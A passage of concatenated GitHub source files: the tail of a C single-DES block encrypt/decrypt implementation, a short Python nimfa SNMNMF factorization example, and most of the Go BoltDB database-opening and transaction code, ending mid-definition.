27, 20, 13, 6, 54, 47, 40, 33,
26, 19, 12, 5, 53, 46, 39, 32,
25, 18, 11, 4, 24, 17, 10, 3,
};
static const unsigned char KeyRotation[16] =
{ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 };
static const unsigned char KeyCompression[48] =
{
13, 16, 10, 23, 0, 4, 2, 27,
14, 5, 20, 9, 22, 18, 11, 3,
25, 7, 15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54, 29, 39,
50, 44, 32, 47, 43, 48, 38, 55,
33, 52, 45, 41, 49, 35, 28, 31
};
static const unsigned char DataExpansion[48] =
{
31, 0, 1, 2, 3, 4, 3, 4,
5, 6, 7, 8, 7, 8, 9, 10,
11, 12, 11, 12, 13, 14, 15, 16,
15, 16, 17, 18, 19, 20, 19, 20,
21, 22, 23, 24, 23, 24, 25, 26,
27, 28, 27, 28, 29, 30, 31, 0
};
static const unsigned char SBox[8][64] =
{
{ /* S0 */
14, 0, 4, 15, 13, 7, 1, 4, 2, 14, 15, 2, 11, 13, 8, 1,
3, 10, 10, 6, 6, 12, 12, 11, 5, 9, 9, 5, 0, 3, 7, 8,
4, 15, 1, 12, 14, 8, 8, 2, 13, 4, 6, 9, 2, 1, 11, 7,
15, 5, 12, 11, 9, 3, 7, 14, 3, 10, 10, 0, 5, 6, 0, 13
},
{ /* S1 */
15, 3, 1, 13, 8, 4, 14, 7, 6, 15, 11, 2, 3, 8, 4, 14,
9, 12, 7, 0, 2, 1, 13, 10, 12, 6, 0, 9, 5, 11, 10, 5,
0, 13, 14, 8, 7, 10, 11, 1, 10, 3, 4, 15, 13, 4, 1, 2,
5, 11, 8, 6, 12, 7, 6, 12, 9, 0, 3, 5, 2, 14, 15, 9
},
{ /* S2 */
10, 13, 0, 7, 9, 0, 14, 9, 6, 3, 3, 4, 15, 6, 5, 10,
1, 2, 13, 8, 12, 5, 7, 14, 11, 12, 4, 11, 2, 15, 8, 1,
13, 1, 6, 10, 4, 13, 9, 0, 8, 6, 15, 9, 3, 8, 0, 7,
11, 4, 1, 15, 2, 14, 12, 3, 5, 11, 10, 5, 14, 2, 7, 12
},
{ /* S3 */
7, 13, 13, 8, 14, 11, 3, 5, 0, 6, 6, 15, 9, 0, 10, 3,
1, 4, 2, 7, 8, 2, 5, 12, 11, 1, 12, 10, 4, 14, 15, 9,
10, 3, 6, 15, 9, 0, 0, 6, 12, 10, 11, 1, 7, 13, 13, 8,
15, 9, 1, 4, 3, 5, 14, 11, 5, 12, 2, 7, 8, 2, 4, 14
},
{ /* S4 */
2, 14, 12, 11, 4, 2, 1, 12, 7, 4, 10, 7, 11, 13, 6, 1,
8, 5, 5, 0, 3, 15, 15, 10, 13, 3, 0, 9, 14, 8, 9, 6,
4, 11, 2, 8, 1, 12, 11, 7, 10, 1, 13, 14, 7, 2, 8, 13,
15, 6, 9, 15, 12, 0, 5, 9, 6, 10, 3, 4, 0, 5, 14, 3
},
{ /* S5 */
12, 10, 1, 15, 10, 4, 15, 2, 9, 7, 2, 12, 6, 9, 8, 5,
0, 6, 13, 1, 3, 13, 4, 14, 14, 0, 7, 11, 5, 3, 11, 8,
9, 4, 14, 3, 15, 2, 5, 12, 2, 9, 8, 5, 12, 15, 3, 10,
7, 11, 0, 14, 4, 1, 10, 7, 1, 6, 13, 0, 11, 8, 6, 13
},
{ /* S6 */
4, 13, 11, 0, 2, 11, 14, 7, 15, 4, 0, 9, 8, 1, 13, 10,
3, 14, 12, 3, 9, 5, 7, 12, 5, 2, 10, 15, 6, 8, 1, 6,
1, 6, 4, 11, 11, 13, 13, 8, 12, 1, 3, 4, 7, 10, 14, 7,
10, 9, 15, 5, 6, 0, 8, 15, 0, 14, 5, 2, 9, 3, 2, 12
},
{ /* S7 */
13, 1, 2, 15, 8, 13, 4, 8, 6, 10, 15, 3, 11, 7, 1, 4,
10, 12, 9, 5, 3, 6, 14, 11, 5, 0, 0, 14, 12, 9, 7, 2,
7, 2, 11, 1, 4, 14, 1, 7, 9, 4, 12, 10, 14, 8, 2, 13,
0, 15, 6, 12, 10, 9, 13, 0, 15, 3, 3, 5, 5, 6, 8, 11
}
};
static const unsigned char PBox[32] =
{
15, 6, 19, 20, 28, 11, 27, 16,
0, 14, 22, 25, 4, 17, 30, 9,
1, 7, 23, 13, 31, 26, 2, 8,
18, 12, 29, 5, 21, 10, 3, 24
};
static const unsigned char FinalPermuteMap[64] =
{
7, 39, 15, 47, 23, 55, 31, 63,
6, 38, 14, 46, 22, 54, 30, 62,
5, 37, 13, 45, 21, 53, 29, 61,
4, 36, 12, 44, 20, 52, 28, 60,
3, 35, 11, 43, 19, 51, 27, 59,
2, 34, 10, 42, 18, 50, 26, 58,
1, 33, 9, 41, 17, 49, 25, 57,
0, 32, 8, 40, 16, 48, 24, 56
};
/* Bit-addressed access into a byte array, MSB-first within each byte
   (bit index 0 is the most significant bit of byte 0). */
#define CLRBIT( STR, IDX ) ( (STR)[(IDX)/8] &= ~(0x01 << (7 - ((IDX)%8))) )
#define SETBIT( STR, IDX ) ( (STR)[(IDX)/8] |= (0x01 << (7 - ((IDX)%8))) )
#define GETBIT( STR, IDX ) (( ((STR)[(IDX)/8]) >> (7 - ((IDX)%8)) ) & 0x01)

/* Bit permutation: output bit i of dst is input bit map[i] of src.
   mapsize is the size of dst in BYTES, so mapsize * 8 output bits are
   produced.  dst is zeroed before the selected bits are set. */
static void Permute( unsigned char *dst, const unsigned char *src, const unsigned char *map, const int mapsize )
{
    int bit;
    const int nbits = mapsize * 8;

    for (bit = 0; bit < mapsize; bit++)
        dst[bit] = 0;

    for (bit = 0; bit < nbits; bit++)
        if (GETBIT( src, map[bit] ))
            SETBIT( dst, bit );
}
/* Rotate each 28-bit half of the 56-bit key left by numbits (1 or 2 per
   the DES key schedule).  The key is packed MSB-first in key[0..6]:
   bits 0..27 form the first half, bits 28..55 the second. */
static void KeyShiftLeft( unsigned char *key, const int numbits )
{
    int i;
    unsigned char keep = key[0];   /* saves the bits shifted off the top */

    for (i = 0; i < numbits; i++)
    {
        int j;

        /* Shift the whole 56-bit block left by one, carrying each
           byte's top bit into the previous byte's bottom bit. */
        for (j = 0; j < 7; j++)
        {
            if (j && (key[j] & 0x80))
                key[j-1] |= 0x01;
            key[j] <<= 1;
        }
        /* Old bit 28 (top of the second half) crossed into the first
           half; move it around to bit 55 to keep the halves separate. */
        if (GETBIT( key, 27 ))
        {
            CLRBIT( key, 27 );
            SETBIT( key, 55 );
        }
        /* Old bit 0 (top of the first half) wraps to bit 27. */
        if (keep & 0x80)
            SETBIT( key, 27 );
        keep <<= 1;
    }
}
/* Inverse of KeyShiftLeft: rotate each 28-bit half of the 56-bit key
   right by numbits.  Same MSB-first packing in key[0..6]. */
static void KeyShiftRight( unsigned char *key, const int numbits )
{
    int i;
    unsigned char keep = key[6];   /* saves the bits shifted off the bottom */

    for (i = 0; i < numbits; i++)
    {
        int j;

        /* Shift the whole 56-bit block right by one, carrying each
           byte's bottom bit into the next byte's top bit. */
        for (j = 6; j >= 0; j--)
        {
            if (j!=6 && (key[j] & 0x01))
                key[j+1] |= 0x80;
            key[j] >>= 1;
        }
        /* Old bit 27 (bottom of the first half) crossed into the second
           half; wrap it around to bit 0 of the first half. */
        if (GETBIT( key, 28 ))
        {
            CLRBIT( key, 28 );
            SETBIT( key, 0 );
        }
        /* Old bit 55 (bottom of the second half) wraps to bit 28. */
        if (keep & 0x01)
            SETBIT( key, 28 );
        keep >>= 1;
    }
}
/* Apply the eight DES S-boxes.  src holds 48 bits as eight consecutive
   6-bit groups (MSB-first); each group indexes SBox[i] and yields 4
   output bits, packed two nibbles per byte into dst[0..3]. */
static void sbox( unsigned char *dst, const unsigned char *src )
{
    int i;

    for (i = 0; i < 4; i++)
        dst[i] = 0;

    for (i = 0; i < 8; i++)
    {
        int j, Snum, bitnum;

        /* Gather the i-th 6-bit group into Snum. */
        for (Snum = j = 0, bitnum = (i * 6); j < 6; j++, bitnum++)
        {
            Snum <<= 1;
            Snum |= GETBIT( src, bitnum );
        }

        /* Even-numbered boxes fill the high nibble, odd the low. */
        if (0 == (i%2))
            dst[i/2] |= ((SBox[i][Snum]) << 4);
        else
            dst[i/2] |= SBox[i][Snum];
    }
}
/* Byte-wise XOR: dst[i] = a[i] ^ b[i] for i in [0, count).
   dst may alias a or b (each byte is read before it is written). */
static void xor( unsigned char *dst, const unsigned char *a, const unsigned char *b, const int count )
{
    const unsigned char *pa = a;
    const unsigned char *pb = b;
    unsigned char *pd = dst;
    int n = count;

    while (n-- > 0)
        *pd++ = (unsigned char)(*pa++ ^ *pb++);
}
/* Encrypt one 8-byte block with single DES.
   dst: 8-byte output buffer; key: 7-byte (56-bit, parity-stripped) key;
   src: 8-byte input block.  Returns dst. */
unsigned char *CRYPT_DEShash( unsigned char *dst, const unsigned char *key, const unsigned char *src )
{
    int i;
    unsigned char K[7];     /* rotating 56-bit key schedule state */
    unsigned char D[8];     /* data block: L half in D[0..3], R in D[4..7] */

    Permute( K, key, KeyPermuteMap, 7 );        /* initial key permutation */
    Permute( D, src, InitialPermuteMap, 8 );    /* initial data permutation */

    /* 16 Feistel rounds. */
    for (i = 0; i < 16; i++)
    {
        int j;
        unsigned char *L = D;
        unsigned char *R = &(D[4]);
        unsigned char Rexp[6];      /* R expanded to 48 bits */
        unsigned char Rn[4];        /* round function output / new R */
        unsigned char SubK[6];      /* 48-bit round subkey */

        KeyShiftLeft( K, KeyRotation[i] );      /* per-round key rotation */
        Permute( SubK, K, KeyCompression, 6 );  /* compress 56 -> 48 bits */

        Permute( Rexp, R, DataExpansion, 6 );   /* expand R to 48 bits */
        xor( Rexp, Rexp, SubK, 6 );             /* mix in the subkey */
        sbox( Rn, Rexp );                       /* S-box substitution -> 32 bits */
        Permute( Rexp, Rn, PBox, 4 );           /* P permutation (reuses Rexp) */
        xor( Rn, L, Rexp, 4 );                  /* new R = L ^ f(R, SubK) */

        /* Swap halves: L <- R, R <- new R. */
        for (j = 0; j < 4; j++)
        {
            L[j] = R[j];
            R[j] = Rn[j];
        }
    }

    Permute( dst, D, FinalPermuteMap, 8 );      /* final permutation */
    return dst;
}
/* Decrypt one 8-byte block with single DES (inverse of CRYPT_DEShash).
   dst: 8-byte output buffer; key: 7-byte (56-bit, parity-stripped) key;
   src: 8-byte ciphertext block.  Returns dst.
   Structure mirrors CRYPT_DEShash, but the subkey for each round is
   taken BEFORE rotating, and the key is rotated right AFTER the round
   (with the rotation schedule walked backwards), so the 16 subkeys are
   applied in reverse order. */
unsigned char *CRYPT_DESunhash( unsigned char *dst, const unsigned char *key, const unsigned char *src )
{
    int i;
    unsigned char K[7];     /* rotating 56-bit key schedule state */
    unsigned char D[8];     /* data block: L half in D[0..3], R in D[4..7] */

    Permute( K, key, KeyPermuteMap, 7 );        /* initial key permutation */
    Permute( D, src, InitialPermuteMap, 8 );    /* initial data permutation */

    /* 16 Feistel rounds with reversed subkey order. */
    for (i = 0; i < 16; i++)
    {
        int j;
        unsigned char *L = D;
        unsigned char *R = &(D[4]);
        unsigned char Rexp[6];      /* R expanded to 48 bits */
        unsigned char Rn[4];        /* round function output / new R */
        unsigned char SubK[6];      /* 48-bit round subkey */

        Permute( SubK, K, KeyCompression, 6 );  /* subkey from current state */

        Permute( Rexp, R, DataExpansion, 6 );   /* expand R to 48 bits */
        xor( Rexp, Rexp, SubK, 6 );             /* mix in the subkey */
        sbox( Rn, Rexp );                       /* S-box substitution -> 32 bits */
        Permute( Rexp, Rn, PBox, 4 );           /* P permutation (reuses Rexp) */
        xor( Rn, L, Rexp, 4 );                  /* new R = L ^ f(R, SubK) */

        /* Swap halves: L <- R, R <- new R. */
        for (j = 0; j < 4; j++)
        {
            L[j] = R[j];
            R[j] = Rn[j];
        }

        KeyShiftRight( K, KeyRotation[15 - i] );    /* undo rotations in reverse */
    }

    Permute( dst, D, FinalPermuteMap, 8 );      /* final permutation */
    return dst;
}
| {
"pile_set_name": "Github"
} |
import numpy as np
import scipy.sparse as sp

import nimfa

# Two random data matrices sharing the same 40 samples (rows), with 100
# and 200 features respectively -- the two views factored jointly.
V = np.random.rand(40, 100)
V1 = np.random.rand(40, 200)

# Sparse Network-regularized Multiple NMF over the pair (V, V1).
# A is a (V1-features x V1-features) and B a (V-features x V1-features)
# sparse association matrix -- both empty here, so no network constraint
# is actually imposed.  gamma/gamma_1/lamb/lamb_1 are regularization
# weights; presumably sparsity and association penalties -- verify exact
# semantics against the nimfa.Snmnmf documentation.
snmnmf = nimfa.Snmnmf(V=V, V1=V1, seed="random_c", rank=10, max_iter=12,
                      A=sp.csr_matrix((V1.shape[1], V1.shape[1])),
                      B=sp.csr_matrix((V.shape[1], V1.shape[1])), gamma=0.01,
                      gamma_1=0.01, lamb=0.01, lamb_1=0.01)
# Calling the model object runs the factorization and returns a fit object.
snmnmf_fit = snmnmf()
"pile_set_name": "Github"
} |
package bolt
import (
"errors"
"fmt"
"hash/fnv"
"log"
"os"
"runtime"
"runtime/debug"
"strings"
"sync"
"time"
"unsafe"
)
// The largest step that can be taken when remapping the mmap.
const maxMmapStep = 1 << 30 // 1GB
// The data file format version.
const version = 2
// Represents a marker value to indicate that a file is a Bolt DB.
const magic uint32 = 0xED0CDAED
// IgnoreNoSync specifies whether the NoSync field of a DB is ignored when
// syncing changes to a file. This is required as some operating systems,
// such as OpenBSD, do not have a unified buffer cache (UBC) and writes
// must be synchronized using the msync(2) syscall.
const IgnoreNoSync = runtime.GOOS == "openbsd"
// Default values if not set in a DB instance.
const (
DefaultMaxBatchSize int = 1000
DefaultMaxBatchDelay = 10 * time.Millisecond
DefaultAllocSize = 16 * 1024 * 1024
)
// default page size for db is set to the OS page size.
var defaultPageSize = os.Getpagesize()
// DB represents a collection of buckets persisted to a file on disk.
// All data access is performed through transactions which can be obtained through the DB.
// All the functions on DB will return a ErrDatabaseNotOpen if accessed before Open() is called.
type DB struct {
// When enabled, the database will perform a Check() after every commit.
// A panic is issued if the database is in an inconsistent state. This
// flag has a large performance impact so it should only be used for
// debugging purposes.
StrictMode bool
// Setting the NoSync flag will cause the database to skip fsync()
// calls after each commit. This can be useful when bulk loading data
// into a database and you can restart the bulk load in the event of
// a system failure or database corruption. Do not set this flag for
// normal use.
//
// If the package global IgnoreNoSync constant is true, this value is
// ignored. See the comment on that constant for more details.
//
// THIS IS UNSAFE. PLEASE USE WITH CAUTION.
NoSync bool
// When true, skips the truncate call when growing the database.
// Setting this to true is only safe on non-ext3/ext4 systems.
// Skipping truncation avoids preallocation of hard drive space and
// bypasses a truncate() and fsync() syscall on remapping.
//
// https://github.com/boltdb/bolt/issues/284
NoGrowSync bool
// If you want to read the entire database fast, you can set MmapFlag to
// syscall.MAP_POPULATE on Linux 2.6.23+ for sequential read-ahead.
MmapFlags int
// MaxBatchSize is the maximum size of a batch. Default value is
// copied from DefaultMaxBatchSize in Open.
//
// If <=0, disables batching.
//
// Do not change concurrently with calls to Batch.
MaxBatchSize int
// MaxBatchDelay is the maximum delay before a batch starts.
// Default value is copied from DefaultMaxBatchDelay in Open.
//
// If <=0, effectively disables batching.
//
// Do not change concurrently with calls to Batch.
MaxBatchDelay time.Duration
// AllocSize is the amount of space allocated when the database
// needs to create new pages. This is done to amortize the cost
// of truncate() and fsync() when growing the data file.
AllocSize int
path string
file *os.File
lockfile *os.File // windows only
dataref []byte // mmap'ed readonly, write throws SEGV
data *[maxMapSize]byte
datasz int
filesz int // current on disk file size
meta0 *meta
meta1 *meta
pageSize int
opened bool
rwtx *Tx
txs []*Tx
freelist *freelist
stats Stats
pagePool sync.Pool
batchMu sync.Mutex
batch *batch
rwlock sync.Mutex // Allows only one writer at a time.
metalock sync.Mutex // Protects meta page access.
mmaplock sync.RWMutex // Protects mmap access during remapping.
statlock sync.RWMutex // Protects stats access.
ops struct {
writeAt func(b []byte, off int64) (n int, err error)
}
// Read only mode.
// When true, Update() and Begin(true) return ErrDatabaseReadOnly immediately.
readOnly bool
}
// Path returns the path to the currently open database file.
func (db *DB) Path() string {
	return db.path
}

// GoString returns the Go-syntax representation of the database.
func (db *DB) GoString() string {
	return fmt.Sprintf("bolt.DB{path:%q}", db.path)
}

// String returns a short human-readable representation of the database.
func (db *DB) String() string {
	return fmt.Sprintf("DB<%q>", db.path)
}
// Open creates and opens a database at the given path.
// If the file does not exist then it will be created automatically.
// Passing in nil options will cause Bolt to open the database with the default options.
func Open(path string, mode os.FileMode, options *Options) (*DB, error) {
	var db = &DB{opened: true}

	// Set default options if no options are provided.
	if options == nil {
		options = DefaultOptions
	}
	db.NoGrowSync = options.NoGrowSync
	db.MmapFlags = options.MmapFlags

	// Set default values for later DB operations.
	db.MaxBatchSize = DefaultMaxBatchSize
	db.MaxBatchDelay = DefaultMaxBatchDelay
	db.AllocSize = DefaultAllocSize

	// Read-only mode affects both the open(2) flags and the lock type taken below.
	flag := os.O_RDWR
	if options.ReadOnly {
		flag = os.O_RDONLY
		db.readOnly = true
	}

	// Open data file and separate sync handler for metadata writes.
	db.path = path
	var err error
	if db.file, err = os.OpenFile(db.path, flag|os.O_CREATE, mode); err != nil {
		_ = db.close()
		return nil, err
	}

	// Lock file so that other processes using Bolt in read-write mode cannot
	// use the database at the same time. This would cause corruption since
	// the two processes would write meta pages and free pages separately.
	// The database file is locked exclusively (only one process can grab the lock)
	// if !options.ReadOnly.
	// The database file is locked using the shared lock (more than one process may
	// hold a lock at the same time) otherwise (options.ReadOnly is set).
	if err := flock(db, mode, !db.readOnly, options.Timeout); err != nil {
		_ = db.close()
		return nil, err
	}

	// Default values for test hooks
	db.ops.writeAt = db.file.WriteAt

	// Initialize the database if it doesn't exist.
	if info, err := db.file.Stat(); err != nil {
		return nil, err
	} else if info.Size() == 0 {
		// Initialize new files with meta pages.
		if err := db.init(); err != nil {
			return nil, err
		}
	} else {
		// Read the first meta page to determine the page size.
		// The 4KB (0x1000) probe is what the file is read with; the meta
		// header must fit inside it for the page-size detection to work.
		var buf [0x1000]byte
		if _, err := db.file.ReadAt(buf[:], 0); err == nil {
			m := db.pageInBuffer(buf[:], 0).meta()
			if err := m.validate(); err != nil {
				// If we can't read the page size, we can assume it's the same
				// as the OS -- since that's how the page size was chosen in the
				// first place.
				//
				// If the first page is invalid and this OS uses a different
				// page size than what the database was created with then we
				// are out of luck and cannot access the database.
				db.pageSize = os.Getpagesize()
			} else {
				db.pageSize = int(m.pageSize)
			}
		}
		// NOTE(review): a ReadAt error is deliberately ignored here; real
		// I/O problems will surface during the mmap below.
	}

	// Initialize page pool.
	db.pagePool = sync.Pool{
		New: func() interface{} {
			return make([]byte, db.pageSize)
		},
	}

	// Memory map the data file.
	if err := db.mmap(options.InitialMmapSize); err != nil {
		_ = db.close()
		return nil, err
	}

	// Read in the freelist.
	db.freelist = newFreelist()
	db.freelist.read(db.page(db.meta().freelist))

	// Mark the database as opened and return.
	return db, nil
}
// mmap opens the underlying memory-mapped file and initializes the meta references.
// minsz is the minimum size that the new mmap can be.
//
// It takes the mmap write lock, so it blocks until every open read
// transaction has released its read lock.
func (db *DB) mmap(minsz int) error {
	db.mmaplock.Lock()
	defer db.mmaplock.Unlock()

	info, err := db.file.Stat()
	if err != nil {
		return fmt.Errorf("mmap stat error: %s", err)
	} else if int(info.Size()) < db.pageSize*2 {
		// A valid database always contains at least the two meta pages.
		return fmt.Errorf("file size too small")
	}

	// Ensure the size is at least the minimum size.
	var size = int(info.Size())
	if size < minsz {
		size = minsz
	}
	size, err = db.mmapSize(size)
	if err != nil {
		return err
	}

	// Dereference all mmap references before unmapping.
	if db.rwtx != nil {
		db.rwtx.root.dereference()
	}

	// Unmap existing data before continuing.
	if err := db.munmap(); err != nil {
		return err
	}

	// Memory-map the data file as a byte slice.
	if err := mmap(db, size); err != nil {
		return err
	}

	// Save references to the meta pages.
	db.meta0 = db.page(0).meta()
	db.meta1 = db.page(1).meta()

	// Validate the meta pages. We only return an error if both meta pages fail
	// validation, since meta0 failing validation means that it wasn't saved
	// properly -- but we can recover using meta1. And vice-versa.
	err0 := db.meta0.validate()
	err1 := db.meta1.validate()
	if err0 != nil && err1 != nil {
		return err0
	}

	return nil
}
// munmap unmaps the data file from memory.
//
// It delegates to the platform-specific munmap helper and wraps any
// failure with context so callers can tell where it originated.
func (db *DB) munmap() error {
	if err := munmap(db); err != nil {
		// Use a literal format string with %s: building the format by
		// concatenating err.Error() would misinterpret any '%' contained
		// in the underlying error message.
		return fmt.Errorf("unmap error: %s", err)
	}
	return nil
}
// mmapSize determines the appropriate mmap size for the given database
// size. Sizes up to 1GB are rounded to the next power of two, starting at
// 32KB; beyond that the size grows in maxMmapStep increments, page-aligned,
// and is clamped to maxMapSize. An error is returned when the requested
// size exceeds the maximum allowed.
func (db *DB) mmapSize(size int) (int, error) {
	// Below 1GB, round up to the next power of two (32KB minimum).
	for shift := uint(15); shift <= 30; shift++ {
		if candidate := 1 << shift; size <= candidate {
			return candidate, nil
		}
	}

	// Reject requests beyond the platform's maximum map size.
	if size > maxMapSize {
		return 0, fmt.Errorf("mmap too large")
	}

	// Above 1GB, grow in whole maxMmapStep increments.
	grown := int64(size)
	if rem := grown % int64(maxMmapStep); rem > 0 {
		grown += int64(maxMmapStep) - rem
	}

	// Keep the final size a multiple of the page size.
	page := int64(db.pageSize)
	if grown%page != 0 {
		grown = (grown/page + 1) * page
	}

	// Never exceed the maximum map size.
	if grown > maxMapSize {
		grown = maxMapSize
	}

	return int(grown), nil
}
// init creates a new database file and initializes its meta pages.
//
// Fresh file layout: pages 0 and 1 are alternating meta pages, page 2 is
// an empty freelist, and page 3 is an empty leaf page acting as the root
// bucket.
func (db *DB) init() error {
	// Set the page size to the OS page size.
	db.pageSize = os.Getpagesize()

	// Create two meta pages on a buffer (four pages total are written below).
	buf := make([]byte, db.pageSize*4)
	for i := 0; i < 2; i++ {
		p := db.pageInBuffer(buf[:], pgid(i))
		p.id = pgid(i)
		p.flags = metaPageFlag

		// Initialize the meta page.
		m := p.meta()
		m.magic = magic
		m.version = version
		m.pageSize = uint32(db.pageSize)
		m.freelist = 2
		m.root = bucket{root: 3}
		m.pgid = 4 // high water mark: first unused page id
		m.txid = txid(i)
		m.checksum = m.sum64()
	}

	// Write an empty freelist at page 2.
	p := db.pageInBuffer(buf[:], pgid(2))
	p.id = pgid(2)
	p.flags = freelistPageFlag
	p.count = 0

	// Write an empty leaf page at page 3 (the root bucket).
	p = db.pageInBuffer(buf[:], pgid(3))
	p.id = pgid(3)
	p.flags = leafPageFlag
	p.count = 0

	// Write the buffer to our data file and flush it to stable storage.
	if _, err := db.ops.writeAt(buf, 0); err != nil {
		return err
	}
	if err := fdatasync(db); err != nil {
		return err
	}

	return nil
}
// Close releases all database resources.
// All transactions must be closed before closing the database.
//
// It acquires the writer lock, the meta lock, and a read lock on the mmap
// (in that order) so that Close cannot proceed while a write transaction
// or a remap is in flight.
func (db *DB) Close() error {
	db.rwlock.Lock()
	defer db.rwlock.Unlock()

	db.metalock.Lock()
	defer db.metalock.Unlock()

	db.mmaplock.RLock()
	defer db.mmaplock.RUnlock()

	return db.close()
}
// close releases the mmap, the file lock, and the file handle.
// It is idempotent, and callers are expected to hold the database locks
// (see Close, which acquires them before delegating here).
func (db *DB) close() error {
	if !db.opened {
		return nil
	}

	db.opened = false

	db.freelist = nil

	// Clear ops.
	db.ops.writeAt = nil

	// Close the mmap.
	if err := db.munmap(); err != nil {
		return err
	}

	// Close file handles.
	if db.file != nil {
		// No need to unlock read-only file.
		if !db.readOnly {
			// Unlock the file. Failure is logged rather than returned so the
			// file descriptor below still gets closed.
			if err := funlock(db); err != nil {
				log.Printf("bolt.Close(): funlock error: %s", err)
			}
		}

		// Close the file descriptor.
		if err := db.file.Close(); err != nil {
			return fmt.Errorf("db file close: %s", err)
		}
		db.file = nil
	}

	db.path = ""
	return nil
}
// Begin starts a new transaction and returns it.
//
// Any number of read-only transactions may run concurrently, but at most
// one writable transaction exists at a time; additional writers block and
// are serialized until the current writer finishes.
//
// Do not open a read transaction and a write transaction in the same
// goroutine: the database periodically needs to re-mmap itself as it grows,
// which cannot happen while a read transaction is open, so the writer can
// deadlock. For long-running read transactions (e.g. snapshots), consider
// setting DB.InitialMmapSize large enough to avoid blocking writers.
//
// IMPORTANT: read-only transactions must be closed when you are done with
// them, otherwise old pages are never reclaimed.
func (db *DB) Begin(writable bool) (*Tx, error) {
	if !writable {
		return db.beginTx()
	}
	return db.beginRWTx()
}
// beginTx starts a read-only transaction.
func (db *DB) beginTx() (*Tx, error) {
	// Lock the meta pages while we initialize the transaction. We obtain
	// the meta lock before the mmap lock because that's the order that the
	// write transaction will obtain them.
	db.metalock.Lock()

	// Obtain a read-only lock on the mmap. When the mmap is remapped it will
	// obtain a write lock so all transactions must finish before it can be
	// remapped.
	// This read lock is held for the lifetime of the transaction and is
	// released in removeTx.
	db.mmaplock.RLock()

	// Exit if the database is not open yet.
	if !db.opened {
		db.mmaplock.RUnlock()
		db.metalock.Unlock()
		return nil, ErrDatabaseNotOpen
	}

	// Create a transaction associated with the database.
	t := &Tx{}
	t.init(db)

	// Keep track of transaction until it closes.
	db.txs = append(db.txs, t)
	n := len(db.txs)

	// Unlock the meta pages.
	db.metalock.Unlock()

	// Update the transaction stats.
	db.statlock.Lock()
	db.stats.TxN++
	db.stats.OpenTxN = n
	db.statlock.Unlock()

	return t, nil
}
// beginRWTx starts a read-write transaction. Only one may exist at a time;
// the writer lock taken here is released when the transaction closes.
func (db *DB) beginRWTx() (*Tx, error) {
	// If the database was opened with Options.ReadOnly, return an error.
	if db.readOnly {
		return nil, ErrDatabaseReadOnly
	}

	// Obtain writer lock. This is released by the transaction when it closes.
	// This enforces only one writer transaction at a time.
	db.rwlock.Lock()

	// Once we have the writer lock then we can lock the meta pages so that
	// we can set up the transaction.
	db.metalock.Lock()
	defer db.metalock.Unlock()

	// Exit if the database is not open yet.
	if !db.opened {
		db.rwlock.Unlock()
		return nil, ErrDatabaseNotOpen
	}

	// Create a transaction associated with the database.
	t := &Tx{writable: true}
	t.init(db)
	db.rwtx = t

	// Free any pages associated with closed read-only transactions.
	// minid is the smallest txid still referenced by an open read
	// transaction; pages freed before it are safe to release.
	var minid txid = 0xFFFFFFFFFFFFFFFF
	for _, t := range db.txs {
		if t.meta.txid < minid {
			minid = t.meta.txid
		}
	}
	if minid > 0 {
		db.freelist.release(minid - 1)
	}

	return t, nil
}
// removeTx removes a transaction from the database.
func (db *DB) removeTx(tx *Tx) {
	// Release the read lock on the mmap (acquired in beginTx).
	db.mmaplock.RUnlock()

	// Use the meta lock to restrict access to the DB object.
	db.metalock.Lock()

	// Remove the transaction.
	// Swap-with-last removal: O(1), does not preserve the slice order.
	for i, t := range db.txs {
		if t == tx {
			last := len(db.txs) - 1
			db.txs[i] = db.txs[last]
			db.txs[last] = nil // drop the reference so the Tx can be collected
			db.txs = db.txs[:last]
			break
		}
	}
	n := len(db.txs)

	// Unlock the meta pages.
	db.metalock.Unlock()

	// Merge statistics.
	db.statlock.Lock()
	db.stats.OpenTxN = n
	db.stats.TxStats.add(&tx.stats)
	db.statlock.Unlock()
}
// Update runs fn inside a managed read-write transaction. The transaction
// is committed when fn returns nil and rolled back when fn returns an
// error; whichever error arises (from fn or from the commit) is returned.
//
// Calling Commit or Rollback manually inside fn panics.
func (db *DB) Update(fn func(*Tx) error) error {
	tx, err := db.Begin(true)
	if err != nil {
		return err
	}

	// Roll back if fn panics before we reach the commit below.
	defer func() {
		if tx.db != nil {
			tx.rollback()
		}
	}()

	// Managed transactions forbid manual Commit/Rollback inside fn.
	tx.managed = true
	fnErr := fn(tx)
	tx.managed = false

	if fnErr != nil {
		_ = tx.Rollback()
		return fnErr
	}

	return tx.Commit()
}
// View runs fn inside a managed read-only transaction. Any error returned
// by fn (or by the final rollback) is returned to the caller.
//
// Calling Rollback manually inside fn panics.
func (db *DB) View(fn func(*Tx) error) error {
	tx, err := db.Begin(false)
	if err != nil {
		return err
	}

	// Roll back if fn panics before the normal rollback below runs.
	defer func() {
		if tx.db != nil {
			tx.rollback()
		}
	}()

	// Managed transactions forbid manual Rollback inside fn.
	tx.managed = true
	fnErr := fn(tx)
	tx.managed = false

	if fnErr != nil {
		_ = tx.Rollback()
		return fnErr
	}

	// Read-only transactions always finish with a rollback.
	return tx.Rollback()
}
// Batch calls fn as part of a batch. It behaves similar to Update,
// except:
//
// 1. concurrent Batch calls can be combined into a single Bolt
// transaction.
//
// 2. the function passed to Batch may be called multiple times,
// regardless of whether it returns error or not.
//
// This means that Batch function side effects must be idempotent and
// take permanent effect only after a successful return is seen in
// caller.
//
// The maximum batch size and delay can be adjusted with DB.MaxBatchSize
// and DB.MaxBatchDelay, respectively.
//
// Batch is only useful when there are multiple goroutines calling it.
func (db *DB) Batch(fn func(*Tx) error) error {
	// Buffered so the batch goroutine never blocks delivering the result.
	errCh := make(chan error, 1)

	db.batchMu.Lock()
	if (db.batch == nil) || (db.batch != nil && len(db.batch.calls) >= db.MaxBatchSize) {
		// There is no existing batch, or the existing batch is full; start a new one.
		db.batch = &batch{
			db: db,
		}
		// The timer guarantees the batch runs even if it never fills up.
		db.batch.timer = time.AfterFunc(db.MaxBatchDelay, db.batch.trigger)
	}
	db.batch.calls = append(db.batch.calls, call{fn: fn, err: errCh})
	if len(db.batch.calls) >= db.MaxBatchSize {
		// wake up batch, it's ready to run
		go db.batch.trigger()
	}
	db.batchMu.Unlock()

	// Block until the batch goroutine reports the outcome for this call.
	err := <-errCh
	if err == trySolo {
		// Our fn failed inside the shared batch; re-run it alone.
		err = db.Update(fn)
	}
	return err
}
// call is a single queued Batch request: the user function plus the
// channel on which its final error is delivered.
type call struct {
